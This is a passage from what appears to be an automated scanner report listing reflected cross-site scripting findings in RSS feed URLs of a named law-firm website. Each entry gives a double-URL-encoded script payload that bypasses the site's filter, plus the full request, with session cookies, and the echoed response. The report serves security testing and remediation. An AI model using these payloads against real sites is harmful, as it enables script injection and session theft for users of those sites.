<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Antitrust/rss.xml10885"><script>alert(1)</script>9f493b0ddcb" value="">
...[SNIP]...

2.138. http://www.wileyrein.com/rss/practices/Appellate/rss.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Appellate/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b382%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed866589a601 was submitted in the REST URL parameter 1. This input was echoed as 4b382"><script>alert(1)</script>d866589a601 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss4b382%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed866589a601/practices/Appellate/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss4b382"><script>alert(1)</script>d866589a601/practices/Appellate/rss.xml" value="">
...[SNIP]...

2.139. http://www.wileyrein.com/rss/practices/Appellate/rss.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Appellate/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83f09%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9da8d699e40 was submitted in the REST URL parameter 2. This input was echoed as 83f09"><script>alert(1)</script>9da8d699e40 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices83f09%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9da8d699e40/Appellate/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices83f09"><script>alert(1)</script>9da8d699e40/Appellate/rss.xml" value="">
...[SNIP]...

2.140. http://www.wileyrein.com/rss/practices/Appellate/rss.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Appellate/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3566d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e021d1023e4a was submitted in the REST URL parameter 3. This input was echoed as 3566d"><script>alert(1)</script>021d1023e4a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Appellate3566d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e021d1023e4a/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Appellate3566d"><script>alert(1)</script>021d1023e4a/rss.xml" value="">
...[SNIP]...

2.141. http://www.wileyrein.com/rss/practices/Appellate/rss.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Appellate/rss.xml

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c988%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e407b643948c was submitted in the REST URL parameter 4. This input was echoed as 2c988"><script>alert(1)</script>407b643948c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Appellate/rss.xml2c988%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e407b643948c HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Appellate/rss.xml2c988"><script>alert(1)</script>407b643948c" value="">
...[SNIP]...

2.142. http://www.wileyrein.com/rss/practices/Aviation/rss.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Aviation/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2da3e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e93729e4d7b0 was submitted in the REST URL parameter 1. This input was echoed as 2da3e"><script>alert(1)</script>93729e4d7b0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss2da3e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e93729e4d7b0/practices/Aviation/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss2da3e"><script>alert(1)</script>93729e4d7b0/practices/Aviation/rss.xml" value="">
...[SNIP]...

2.143. http://www.wileyrein.com/rss/practices/Aviation/rss.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Aviation/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed7d3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edd1cc3a52a5 was submitted in the REST URL parameter 2. This input was echoed as ed7d3"><script>alert(1)</script>dd1cc3a52a5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practicesed7d3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edd1cc3a52a5/Aviation/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practicesed7d3"><script>alert(1)</script>dd1cc3a52a5/Aviation/rss.xml" value="">
...[SNIP]...

2.144. http://www.wileyrein.com/rss/practices/Aviation/rss.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Aviation/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5cb1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7ae874bc296 was submitted in the REST URL parameter 3. This input was echoed as d5cb1"><script>alert(1)</script>7ae874bc296 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Aviationd5cb1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7ae874bc296/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Aviationd5cb1"><script>alert(1)</script>7ae874bc296/rss.xml" value="">
...[SNIP]...

2.145. http://www.wileyrein.com/rss/practices/Aviation/rss.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Aviation/rss.xml

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f5ee%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e49810451264 was submitted in the REST URL parameter 4. This input was echoed as 2f5ee"><script>alert(1)</script>49810451264 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Aviation/rss.xml2f5ee%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e49810451264 HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Aviation/rss.xml2f5ee"><script>alert(1)</script>49810451264" value="">
...[SNIP]...

2.146. http://www.wileyrein.com/rss/practices/Bankruptcy__Financial_Restructuring/rss.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Bankruptcy__Financial_Restructuring/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e654b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed4d67e0d85e was submitted in the REST URL parameter 1. This input was echoed as e654b"><script>alert(1)</script>d4d67e0d85e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rsse654b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed4d67e0d85e/practices/Bankruptcy__Financial_Restructuring/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rsse654b"><script>alert(1)</script>d4d67e0d85e/practices/Bankruptcy__Financial_Restructuring/rss.xml" value="">
...[SNIP]...

2.147. http://www.wileyrein.com/rss/practices/Bankruptcy__Financial_Restructuring/rss.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Bankruptcy__Financial_Restructuring/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53a9f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee2b7ff89294 was submitted in the REST URL parameter 2. This input was echoed as 53a9f"><script>alert(1)</script>e2b7ff89294 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices53a9f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee2b7ff89294/Bankruptcy__Financial_Restructuring/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices53a9f"><script>alert(1)</script>e2b7ff89294/Bankruptcy__Financial_Restructuring/rss.xml" value="">
...[SNIP]...

2.148. http://www.wileyrein.com/rss/practices/Bankruptcy__Financial_Restructuring/rss.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Bankruptcy__Financial_Restructuring/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 705db%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4b5b4bac229 was submitted in the REST URL parameter 3. This input was echoed as 705db"><script>alert(1)</script>4b5b4bac229 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Bankruptcy__Financial_Restructuring705db%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4b5b4bac229/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Bankruptcy__Financial_Restructuring705db"><script>alert(1)</script>4b5b4bac229/rss.xml" value="">
...[SNIP]...

2.149. http://www.wileyrein.com/rss/practices/Bankruptcy__Financial_Restructuring/rss.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Bankruptcy__Financial_Restructuring/rss.xml

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7f92%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7324d443b57 was submitted in the REST URL parameter 4. This input was echoed as a7f92"><script>alert(1)</script>7324d443b57 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Bankruptcy__Financial_Restructuring/rss.xmla7f92%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7324d443b57 HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Bankruptcy__Financial_Restructuring/rss.xmla7f92"><script>alert(1)</script>7324d443b57" value="">
...[SNIP]...

2.150. http://www.wileyrein.com/rss/practices/Communications/rss.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Communications/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 413f8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e89fd6730150 was submitted in the REST URL parameter 1. This input was echoed as 413f8"><script>alert(1)</script>89fd6730150 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss413f8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e89fd6730150/practices/Communications/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss413f8"><script>alert(1)</script>89fd6730150/practices/Communications/rss.xml" value="">
...[SNIP]...

2.151. http://www.wileyrein.com/rss/practices/Communications/rss.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Communications/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fe4c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e24c5c30db8e was submitted in the REST URL parameter 2. This input was echoed as 3fe4c"><script>alert(1)</script>24c5c30db8e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices3fe4c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e24c5c30db8e/Communications/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices3fe4c"><script>alert(1)</script>24c5c30db8e/Communications/rss.xml" value="">
...[SNIP]...

2.152. http://www.wileyrein.com/rss/practices/Communications/rss.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Communications/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21c62%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eda39f0f31a2 was submitted in the REST URL parameter 3. This input was echoed as 21c62"><script>alert(1)</script>da39f0f31a2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

